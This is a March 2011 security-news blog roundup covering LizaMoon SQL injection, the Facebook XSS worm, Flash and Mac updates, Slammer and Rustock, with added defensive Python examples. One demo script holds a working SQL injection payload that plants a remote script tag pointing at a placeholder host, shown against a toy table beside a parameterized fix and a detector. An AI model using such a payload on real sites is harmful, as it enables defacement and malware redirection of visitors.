March 2011 - Posts

Please be careful with all website links presented to you in Facebook, email, or web searches.  Attackers are using mass SQL injection attacks to seed vulnerable websites with script tags that redirect visitors to FAKEAV and other malware.

LizaMoon Mass SQL Injection Attack continues
http://blog.trendmicro.com/lizamoon-etc-sql-injection-attack-still-on-going/
http://www.eweek.com/c/a/Security/LizaMoon-Mass-SQL-Injection-Attack-Points-to-Rogue-AV-Site-852537/

QUOTE: Websense Security Labs discovered a mass-injection campaign infecting more than 28,000 URLs, including a few Apple iTunes URLs that redirect users to a rogue AV site.  Attackers have launched a large-scale SQL injection attack that has compromised several thousand legitimate Websites, including a few catalog pages from Apple's iTunes music store.

Websense Security Labs and the Websense Threatseeker Network discovered the mass-injection campaign that compromised over 28,000 URLs, including several iTunes URLs, according to Patrik Runald, a senior manager of security research at Websense Security Labs, who posted an alert on the Security Labs blog. The mass-injection attack has been named LizaMoon after the domain hosting the attack code.

Unlike the recent SQL injection attack that affected MySQL.com and Sun.com, this mass injection is a SQL injection attack against a large volume of legitimate sites. The LizaMoon attack inserts a line of code referencing a PHP script that redirects users to another malware site.
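As an added illustration (not code from the Websense or Trend Micro write-ups), the Python script below shows the mechanism in miniature: a catalogue search handler that concatenates user input into its SQL, the same handler with a bound parameter, and a clean-up check a webmaster can run over text columns to find rows that now carry a remote script tag. The table, the product rows, the host lizamoon.example/ur.php and the payload are all constructed for the example; executescript() stands in for a database driver that accepts stacked statements (Microsoft SQL Server, the usual target of these campaigns, does), since sqlite3's execute() refuses a second statement.

```python
import re
import sqlite3

# Constructed injected element, modelled on the page's description (a script tag
# pointing at a remote PHP redirector); the host name is a placeholder.
INJECTED_TAG = '<script src="http://lizamoon.example/ur.php"></script>'

# Any <script> whose src points at an off-site URL; catalogue text never legitimately holds one.
REMOTE_SCRIPT = re.compile(r'<script[^>]*\ssrc=["\']?https?://[^"\'>\s]+', re.IGNORECASE)

# Mass-injection style payload: closes the LIKE literal, appends a second statement that
# rewrites every row's text column, and comments out the remainder of the original query.
MASS_INJECTION_PAYLOAD = (
    "x%'; UPDATE products SET description = description || '" + INJECTED_TAG + "'; --"
)


def make_db():
    """Constructed catalogue table standing in for a site's content database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)")
    conn.executemany(
        "INSERT INTO products (name, description) VALUES (?, ?)",
        [("Widget", "A basic widget."), ("Gadget", "A handy gadget."), ("Gizmo", "A shiny gizmo.")],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """Vulnerable: the search term is concatenated into the SQL text.

    executescript() models a server-side driver that runs stacked statements, so the
    attacker's UPDATE executes with the application's database privileges."""
    sql = "SELECT id, name FROM products WHERE name LIKE '%" + term + "%'"
    conn.executescript(sql)


def search_parameterized(conn, term):
    """Hardened: the term travels as a bound parameter and can only ever be data."""
    pattern = "%" + term + "%"
    return conn.execute(
        "SELECT id, name FROM products WHERE name LIKE ? ORDER BY id", (pattern,)
    ).fetchall()


def find_injected_rows(conn, table, columns):
    """Clean-up check: (row id, column) pairs whose text carries a remote <script>.

    table and columns are trusted identifiers chosen by the operator, never user input."""
    hits = []
    for col in columns:
        rows = conn.execute(f'SELECT id, "{col}" FROM "{table}" ORDER BY id')
        for row_id, value in rows:
            if value and REMOTE_SCRIPT.search(value):
                hits.append((row_id, col))
    return hits


if __name__ == "__main__":
    db = make_db()
    cols = ["name", "description"]
    print("parameterized search with payload:", search_parameterized(db, MASS_INJECTION_PAYLOAD))
    print("injected rows before:", find_injected_rows(db, "products", cols))
    search_vulnerable(db, MASS_INJECTION_PAYLOAD)
    print("injected rows after vulnerable search:", find_injected_rows(db, "products", cols))
```

The parameterized search returns nothing for the payload and leaves the table untouched; the concatenating version rewrites every description in one request. The detection query is the part to keep: run it over every text column after patching, because a campaign like this leaves the injected tag in the data, not just in the served pages.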

While this AVERT warning pertains primarily to the UK, please be careful with all EMAIL messages that seem to come from the IRS or other official agencies.  Remember that the IRS does not initiate contact by email, and that the criminals behind these messages are after personal or bank account information.  Only work through trusted sources.

Tax Season - Beware of scams and fake messages
http://blogs.mcafee.com/mcafee-labs/u-k-tax-scams-on-the-horizon

QUOTE: As the saying goes: Death and taxes are the only constants in life. This adage can be applied to scams on the Internet as well. Every tax season we can count on scams like these to raise their heads and try to bilk users out of their identity information and hard-earned money. A few of the messaging and spam researchers at McAfee Labs sent me some samples earlier today that I would like to share.

Trend Micro has just released a beta version of a standalone FAKEAV removal tool.  This new process-based cleaner appears to be comprehensive. It can be downloaded free of charge and run in Safe Mode to clean these complex infections.

Trend Micro - Creates new FAKEAV standalone removal tool
http://esupport.trendmicro.com/0/Fake-Antivirus-FakeAV-Removal-Tool.aspx

QUOTE: Fake Antivirus (FakeAV) threats have been rampant in the past few years. Various FAKEAV variants have infected millions of PCs and are continuously spreading worldwide. One reason why FAKEAV infections have become well-known to users is because they have visual payloads. Variants of the malware family often display pop-up messages telling users that their machines have been infected. This may cause panic among users, pressuring them to purchase rogue antivirus applications in the hope of resolving the issue. Users, however, should never purchase antivirus software from unknown sources.

eWeek shares this article on IE9, noting many improvements in functionality and security.

Internet Explorer 9 - Ten Reasons to Use it
http://www.eweek.com/c/a/Enterprise-Applications/Microsoft-Internet-Explorer-9-Arrives-10-Reasons-to-Use-It-851132/

QUOTE: Microsoft has officially launched Internet Explorer 9. Although the browser’s history has been spotty, Internet Explorer 9 is the one new browser that every user should be trying. Microsoft has officially launched Internet Explorer 9. The browser, which is being touted by many reviewers already as the best version of the software the company has ever released, follows a long line of predecessors that at times won customers over and at other times failed miserably. But it's a new day for Microsoft and Internet Explorer. The time has finally come for the company to face Google's Chrome browser head-on.

1. It's fast
2. A vastly improved interface
3. It's awfully Chrome-like
4. The Pinned Sites feature is nice
5. It's much more secure
6. It's a big step up over previous versions
7. The enterprise will be happy
8. A new Microsoft?
9. Putting an end to tracking
10. It's another good reason to ditch Windows XP

Please be careful with links presented to you in Facebook. A new XSS worm is circulating that automatically posts messages with malicious links on the Facebook walls of your friends and contacts.

Facebook - New XSS Worm Allows Automatic Wall Posts
http://www.symantec.com/connect/blogs/new-xss-facebook-worm-allows-automatic-wall-posts

QUOTE: Currently a new and unpatched cross-site scripting (XSS) vulnerability in Facebook is being widely used to automatically post messages to other users' walls. The vulnerability was used for some time in some smaller cases; however, it is now widely being used for the first time by many different groups—especially in Indonesia, where we are seeing thousands of infected messages being posted by unknowing users.

Any user who is logged into Facebook and visits a site that contains such an element will automatically post an arbitrary message to his or her wall. There is no other user interaction required, and there are no tricks involved, like clickjacking. Just visiting an infected website is enough to post a message that the attacker has chosen. Therefore it should be of no surprise that some of those messages are spreading very fast through Facebook.

Mouse Training Company - Free MS Office Training Manuals
http://www.mousetraining.co.uk/ms-office-training-manuals.html

QUOTE: We have made all our MS Office training manuals available to download for free. The files are in PDF format that will allow you to Save, Print or Email to yourself.  If you are not a Mouse Training client and would like to make use of the manuals, we kindly ask that you provide a HTML link back to our site from your company website. Please use the following information for the link. The manuals are copyright protected under Wiki Commons License. This agreement will allow you to download, edit, distribute and store the manuals without limit.

Internet Private Browsing - IE, Firefox, and Chrome
http://blog.trendmicro.com/private-browsing/

QUOTE: Chrome, Firefox, and Internet Explorer released major updates this week. The timing may be a coincidence or not but there is a very interesting feature that all three browsers are developing almost at the same time—private browsing.

Each of the three approaches to private browsing has its merits:

Mozilla Firefox advocates the use of a new HTTP header that, with time, all websites should honor

Google Chrome instead uses a blacklist of websites published by Google

Microsoft Internet Explorer is similar, except that it allows for a more granular control over lists

Finally, private browsing! But how does this change my life? Well, for starters, you can now minimize the amount of targeted advertising you’re exposed to. That’s if you want to, of course. The key element is choice. The three main browsers have chosen three very different ways to implement privacy.

Some of the key security enhancements found in the new version of Firefox are listed below:

Firefox 4 Security Features
http://isc.sans.edu/diary.html?storyid=10594
https://developer.mozilla.org/en/Firefox_4_for_developers#Security

Firefox 4 - All Features (Technical writeup)
https://developer.mozilla.org/en/Firefox_4_for_developers

QUOTE: Like no other release before it, Firefox 4 includes a number of significant security features. These features are addressing attacks that are particularly hard to avoid by developers and in which the browser is more so the victim than the server.

These attacks, Cross Site Scripting (XSS), redirects to HTTP pages from HTTPS and Clickjacking use vulnerable web applications more as a mirror to bounce attacks into the browser. The browser can provide meaningful protection against these attacks, unlike for more server centric attacks like SQL injection, for which the attacker is in full control of the client.
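The three attacks the ISC diary names map onto three response headers that Firefox 4 honours: X-Frame-Options against clickjacking, Strict-Transport-Security against being redirected back to http://, and Content-Security-Policy (sent as X-Content-Security-Policy in Firefox 4's experimental implementation) against XSS of the kind behind the Facebook worm above. The browser only enforces what the server sends, so the useful check is on the server side. The Python audit below is an added example, not code from the ISC or Mozilla; the two header sets are constructed, a weak one next to a corrected one, and the six-month HSTS minimum is this example's own threshold.

```python
import re

# Firefox 4 accepted CSP under the experimental X- name; later browsers use the plain name.
CSP_HEADERS = ("content-security-policy", "x-content-security-policy")
MIN_HSTS_MAX_AGE = 60 * 60 * 24 * 180  # six months; an assumed minimum, not a standard value


def _get(headers, name):
    """Case-insensitive lookup of a header in a plain dict (name given in lowercase)."""
    for k, v in headers.items():
        if k.lower() == name:
            return v
    return None


def audit_security_headers(headers):
    """Findings for one HTTPS response's headers; an empty list means all checks passed."""
    findings = []

    # Clickjacking: the page must forbid framing by other origins.
    xfo = _get(headers, "x-frame-options")
    if xfo is None:
        findings.append("X-Frame-Options missing: page can be framed (clickjacking)")
    elif xfo.strip().upper() not in ("DENY", "SAMEORIGIN"):
        findings.append(f"X-Frame-Options value {xfo!r} is not DENY or SAMEORIGIN")

    # HTTPS downgrade: HSTS tells the browser never to follow an http:// redirect for this host.
    hsts = _get(headers, "strict-transport-security")
    if hsts is None:
        findings.append("Strict-Transport-Security missing: browser will accept redirects back to http://")
    else:
        m = re.search(r"max-age\s*=\s*(\d+)", hsts, re.IGNORECASE)
        if not m or int(m.group(1)) < MIN_HSTS_MAX_AGE:
            findings.append(f"Strict-Transport-Security max-age too short or absent: {hsts!r}")
        if "includesubdomains" not in hsts.lower():
            findings.append("Strict-Transport-Security lacks includeSubDomains")

    # XSS: a CSP whose script-src allows inline script or any origin gives no real protection.
    csp = None
    for name in CSP_HEADERS:
        csp = _get(headers, name)
        if csp is not None:
            break
    if csp is None:
        findings.append("Content-Security-Policy missing: no browser-side XSS mitigation")
    else:
        directives = {}
        for part in csp.split(";"):
            tokens = part.split()
            if tokens:
                directives[tokens[0].lower()] = tokens[1:]
        script_src = directives.get("script-src", directives.get("default-src", []))
        if not script_src:
            findings.append("Content-Security-Policy sets neither script-src nor default-src")
        elif "'unsafe-inline'" in script_src or "*" in script_src:
            findings.append(f"Content-Security-Policy script-src too permissive: {' '.join(script_src)}")
    return findings


# Constructed header sets: what many sites sent in 2011, and a corrected set.
WEAK_HEADERS = {
    "Content-Type": "text/html",
    "Strict-Transport-Security": "max-age=300",
    "Content-Security-Policy": "default-src *; script-src * 'unsafe-inline'",
}
HARDENED_HEADERS = {
    "Content-Type": "text/html",
    "X-Frame-Options": "DENY",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "X-Content-Security-Policy": "default-src 'self'; script-src 'self' https://static.example",
}

if __name__ == "__main__":
    for label, hdrs in (("weak", WEAK_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, audit_security_headers(hdrs) or ["ok"])
```

Feed it the header dict from any HTTP client and act on the findings; the weak set above produces four. None of these headers help a user still on an older browser, which is the practical argument for the Firefox 4 upgrade the diary makes.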

All Apple Mac OS X users should update their systems as prompted.  There were 53 issues addressed in several components, including third-party software.

Apple Mac OS X - Security Update 2011-001
http://blogs.pcmag.com/securitywatch/2011/03/mac_os_x_update_fixes_dozens_o.php

Mac OS X v10.6.7 and Security Update 2011-001
http://support.apple.com/kb/HT4581

QUOTE: This document describes the security content of Mac OS X v10.6.7 and Security Update 2011-001, which can be downloaded and installed via Software Update preferences, or from Apple Downloads.

We should be careful when sharing information on Facebook and other social networks. Sometimes, I see friends sharing advance plans for a trip, vacation, or other outing. As these posts are often visible to the general public, there have indeed been accounts of people burglarized while away, with the criminals confessing that they found the target through a Facebook post.

Social Network Users too friendly in sharing information publicly
http://blogs.pcmag.com/securitywatch/2011/03/survey_says_users_too_friendly.php

QUOTE: It's old news that people are way too trusting on social media sites with their personal information, but it's no less disturbing for being banal. Would you walk around on the street holding a sign displaying your birthday, home town, and other data people commonly put in their Facebook public profiles?

ID Analytics's message is that you shouldn't be one of the low-hanging fruit. They have 3 rules of thumb for protecting your identity:

1. Be careful what you share
2. Protect what you have
3. Monitor, monitor, monitor

ID Analytics - In-depth study of Privacy
http://www.idanalytics.com/news-and-events/news-releases/2011/3-22-2011.php

Below is an interesting post from the ISC on an unexplained sharp decrease in port 1434 attacks by the SQL Slammer worm (first seen in January 2003).

Port 1434: Sudden Slammer Decline?
http://isc.sans.edu/diary.html?storyid=10576

QUOTE: We're interested to know what's happening out there.  It has been observed through DShield data that Slammer traffic has had a sudden decline.  I played with the data for a while.  I could make it look like many things, such as slow and steady decline over time.  However, the most compelling story is the one where the data drops on March 9 and 10.

Below is the DShield data and graph on port 1434 for March 2011.  It's speculative at this point as to the cause of the sudden drop.  Japan's earthquake or Patch Tuesday have been kicked around.  I would be remiss if I did not mention Kevin Liston's series on Slammer Cleanup during October. We are loving the thought his great effort was a catalyst for the eradication of it. So go back and take a look at your data for us and share what you're seeing. 
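The diary's point is that the same series can be read as a slow decline or as a step on March 9 and 10. As an added example (not the ISC's code; the counts are constructed to have that shape and are not DShield data), the Python below fits both stories to daily UDP/1434 counts and compares their residual error, which is how to choose between them instead of eyeballing the graph.

```python
from datetime import date, timedelta

# Constructed daily hit counts on UDP/1434 for 1-14 March 2011 (one sensor, arbitrary
# scale). NOT DShield's data; it only reproduces the shape the diary describes.
START = date(2011, 3, 1)
COUNTS = [1020, 980, 1010, 990, 1000, 1005, 995, 1000, 600, 400, 400, 400, 400, 400]


def _sse(values, fitted):
    """Sum of squared residuals between observed and fitted values."""
    return sum((v - f) ** 2 for v, f in zip(values, fitted))


def linear_fit_sse(counts):
    """Residual error of the 'slow and steady decline' story: one least-squares line."""
    n = len(counts)
    xs = range(n)
    mean_x = sum(xs) / n
    mean_y = sum(counts) / n
    sxx = sum((x - mean_x) ** 2 for x in xs)
    sxy = sum((x - mean_x) * (y - mean_y) for x, y in zip(xs, counts))
    slope = sxy / sxx
    intercept = mean_y - slope * mean_x
    return _sse(counts, [intercept + slope * x for x in xs])


def best_step_change(counts, start=START):
    """Residual error of the 'sudden drop' story: two flat levels with one change point.

    Tries every split, keeps the one with the smallest residual, and returns the first
    day of the new level, both level means and the residual."""
    best = None
    for k in range(1, len(counts)):
        before, after = counts[:k], counts[k:]
        m_before = sum(before) / len(before)
        m_after = sum(after) / len(after)
        sse = _sse(before, [m_before] * len(before)) + _sse(after, [m_after] * len(after))
        if best is None or sse < best["sse"]:
            best = {
                "step_date": (start + timedelta(days=k)).isoformat(),
                "level_before": round(m_before, 1),
                "level_after": round(m_after, 1),
                "sse": sse,
            }
    return best


def compare_stories(counts, start=START):
    """Fit both models and report which explains the series with less residual error."""
    result = best_step_change(counts, start)
    result["sse_linear"] = linear_fit_sse(counts)
    result["better_model"] = "step" if result["sse"] < result["sse_linear"] else "linear"
    return result


if __name__ == "__main__":
    print(compare_stories(COUNTS))
```

On the constructed series the step model wins by a wide margin and places the change on March 9. The same two fits over a sensor's real counts, split by source network, would also say whether the drop came from one region (the earthquake hypothesis) or everywhere at once (patching or cleanup), which a single global graph cannot.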

Firefox 4.0 has just debuted and is working well in testing as a complementary browser.

Firefox 4.0 - Home Page
http://www.mozilla.com/en-US/products/download.html?product=firefox-4.0

Firefox 4.0 - Whats New
http://www.mozilla.com/en-US/firefox/features/

Firefox 4.0 - Tips and techniques
http://www.mozilla.com/en-US/firefox/tips/

Firefox 4.0 - Security
http://www.mozilla.com/en-US/firefox/features/#advancedsecurity

Please update the Adobe Flash component for your browsers as automatically prompted.

Adobe Flash Player update addresses a critical security issue (CVE-2011-0609)
http://www.adobe.com/support/security/bulletins/apsb11-05.html
http://isc.sans.edu/diary/Adobe+Flash+Player+update+RSA+further+notification+and+Play+com+breach/10585

QUOTE:  A critical vulnerability has been identified in Adobe Flash Player 10.2.152.33 and earlier versions (Adobe Flash Player 10.2.154.18 and earlier versions for Chrome users) for Windows, Macintosh, Linux, and Solaris operating systems, and Adobe Flash Player 10.1.106.16 and earlier versions for Android. This vulnerability (CVE-2011-0609), as referenced in Security Advisory APSA11-01, could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being exploited in the wild against Flash Player in targeted attacks via a Flash (.swf) file embedded in a Microsoft Excel (.xls) file delivered as an email attachment.
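The delivery vector here, a .swf carried inside an .xls, is easy to triage at a mail gateway or on a suspect attachment because a Flash file begins with a fixed header: the bytes FWS (uncompressed) or CWS (zlib-compressed), one version byte, and a little-endian 32-bit uncompressed length. The Python below is an added example, not Adobe's or the ISC's tooling; the sample "attachment" it builds is constructed, and the version and size bounds are this example's own sanity limits.

```python
import struct
import zlib

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # compound document header (legacy .xls/.doc)
SWF_SIGNATURES = (b"FWS", b"CWS")                # uncompressed / zlib-compressed Flash


def find_embedded_swf(data):
    """Scan raw bytes for plausible SWF headers and return a list of dicts.

    Matching the three signature letters alone gives false positives in arbitrary data,
    so the version and length fields are sanity-checked (this example's own bounds) and a
    CWS body is test-inflated."""
    hits = []
    for sig in SWF_SIGNATURES:
        pos = data.find(sig)
        while pos != -1:
            if pos + 8 <= len(data):
                version = data[pos + 3]
                length = struct.unpack_from("<I", data, pos + 4)[0]
                plausible = 1 <= version <= 32 and 8 < length < 64 * 1024 * 1024
                if plausible and sig == b"FWS":
                    plausible = pos + length <= len(data)   # uncompressed: length is on-disk size
                elif plausible:
                    try:                                    # compressed: must inflate at all
                        body = zlib.decompressobj().decompress(data[pos + 8:], 64)
                        plausible = len(body) > 0
                    except zlib.error:
                        plausible = False
                if plausible:
                    hits.append({"offset": pos, "kind": sig.decode(), "version": version, "length": length})
            pos = data.find(sig, pos + 1)
    return sorted(hits, key=lambda h: h["offset"])


def triage_attachment(data):
    """One-line verdict for a gateway rule or an incident-response script."""
    is_ole = data.startswith(OLE_MAGIC)
    swfs = find_embedded_swf(data)
    if is_ole and swfs:
        return "SUSPICIOUS: OLE document carrying %d embedded SWF(s)" % len(swfs)
    if swfs:
        return "NOTE: SWF content found in a non-OLE file"
    return "CLEAN: no SWF header found"


def build_sample():
    """Constructed stand-in for a booby-trapped .xls: OLE magic, filler, then a tiny CWS."""
    inner = b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00\x00\x0c\x01\x00" + b"\x00" * 40  # fake SWF body
    cws = b"CWS" + bytes([10]) + struct.pack("<I", 8 + len(inner)) + zlib.compress(inner)
    return OLE_MAGIC + b"\x00" * 504 + b"Workbook\x00" * 3 + cws + b"\x00" * 100


if __name__ == "__main__":
    sample = build_sample()
    print(find_embedded_swf(sample))
    print(triage_attachment(sample))
```

One caveat for real files: a compound document stores streams in 512-byte sectors that need not be contiguous, so a raw scan can find the header while the length check or the inflate test fails on a fragmented stream. Reassemble the streams with an OLE parser (the olefile module, for instance) and run the scan over each stream when the raw result is inconclusive.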

Microsoft and other security firms continue to fight spam, botnets, and other sophisticated attacks.  Recently a large and complex botnet known as Rustock was taken offline, reducing spam volumes and improving Internet safety.

Microsoft's DCU unit disrupts Rustock botnet
http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/18/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx
http://www.zdnet.com/blog/security/rustock-botnets-operations-disrupted/8456

QUOTE: Just over a year ago, we announced that the Microsoft Digital Crimes Unit  (DCU), in cooperation with industry and academic experts, had successfully taken down the botnet Waledac in an operation known as “Operation b49”. Today, I’m happy to announce that based on the knowledge gained in that effort, we have successfully taken down a larger, more notorious and complex botnet known as Rustock. This botnet is estimated to have approximately a million infected computers operating under its control and has been known to be capable of sending billions of spam mails every day, including fake Microsoft lottery scams and offers for fake – and potentially dangerous – prescription drugs.


Microsoft Office XP extended support ends July 12, 2011
http://blogs.pcmag.com/securitywatch/2011/03/office_xp_to_go_off_support_in.php
http://support.microsoft.com/common/international.aspx?RDPATH=dm;en-us;lifecycle&p1=2533

QUOTE: On July 12, 2011, Microsoft Office XP will exit its "Extended Support Phase," ending, among other things, the provision of security updates for it.
